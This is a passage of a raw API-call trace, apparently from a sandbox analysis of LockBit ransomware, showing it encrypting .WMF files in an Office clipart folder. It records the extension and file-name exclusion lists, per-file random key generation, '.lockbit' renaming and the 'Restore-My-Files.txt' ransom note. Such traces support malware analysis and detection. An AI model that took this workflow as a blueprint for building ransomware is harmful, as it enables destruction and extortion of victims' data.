Office\\CLIPART\\PUB60COR\\") returned="" [0153.520] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF") returned=".WMF" [0153.520] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.520] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.520] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.521] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.521] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF.lockbit") returned 72 [0153.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239951.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.523] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.523] malloc (_Size=0x40068) returned 0x3df0008 [0153.523] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7232) returned 1 [0153.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.524] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.529] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.529] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.530] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.530] free (_Block=0x1fa2ed8) [0153.530] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239951.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.530] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.530] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.530] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1bc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239953.WMF", cAlternateFileName="")) returned 1 [0153.530] lstrcmpiW (lpString1=".", lpString2="J0239953.WMF") returned -1 [0153.530] lstrcmpiW (lpString1="..", lpString2="J0239953.WMF") returned -1 [0153.531] PathFindExtensionW (pszPath="J0239953.WMF") returned=".WMF" [0153.531] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.531] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.532] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.532] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239953.WMF") returned 1 [0153.532] lstrcmpiW (lpString1="ntldr", lpString2="J0239953.WMF") returned 1 [0153.532] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239953.WMF") returned 1 [0153.532] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239953.WMF") returned -1 [0153.532] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239953.WMF") returned -1 [0153.533] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239953.WMF") returned 1 [0153.533] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239953.WMF") returned -1 [0153.533] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.533] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF") returned=".WMF" [0153.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.533] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.533] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.534] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.534] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF.lockbit") returned 72 [0153.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239953.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.535] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.535] malloc (_Size=0x40068) returned 0x3df0008 [0153.535] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7112) returned 1 [0153.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.536] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.553] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.553] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.553] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.555] free (_Block=0x1fa2ed8) [0153.555] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239953.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.555] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.555] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.555] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1348, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239955.WMF", cAlternateFileName="")) returned 1 [0153.555] lstrcmpiW (lpString1=".", lpString2="J0239955.WMF") returned -1 [0153.555] lstrcmpiW (lpString1="..", lpString2="J0239955.WMF") returned -1 [0153.555] PathFindExtensionW (pszPath="J0239955.WMF") returned=".WMF" [0153.555] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.555] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.556] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.556] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239955.WMF") returned 1 [0153.557] lstrcmpiW (lpString1="ntldr", lpString2="J0239955.WMF") returned 1 [0153.557] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239955.WMF") returned 1 [0153.557] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239955.WMF") returned -1 [0153.557] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239955.WMF") returned -1 [0153.557] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239955.WMF") returned 1 [0153.557] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239955.WMF") returned -1 [0153.557] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.557] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF") returned=".WMF" [0153.557] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.557] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.557] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.558] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.558] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF.lockbit") returned 72 [0153.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239955.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.560] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.560] malloc (_Size=0x40068) returned 0x3df0008 [0153.561] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4936) returned 1 [0153.561] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.561] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.561] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.562] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.567] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.567] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.568] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.568] free (_Block=0x1fa2ed8) [0153.568] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239955.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.568] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.568] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.568] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1720, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239965.WMF", cAlternateFileName="")) returned 1 [0153.568] lstrcmpiW (lpString1=".", lpString2="J0239965.WMF") returned -1 [0153.568] lstrcmpiW (lpString1="..", lpString2="J0239965.WMF") returned -1 [0153.569] PathFindExtensionW (pszPath="J0239965.WMF") returned=".WMF" [0153.569] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 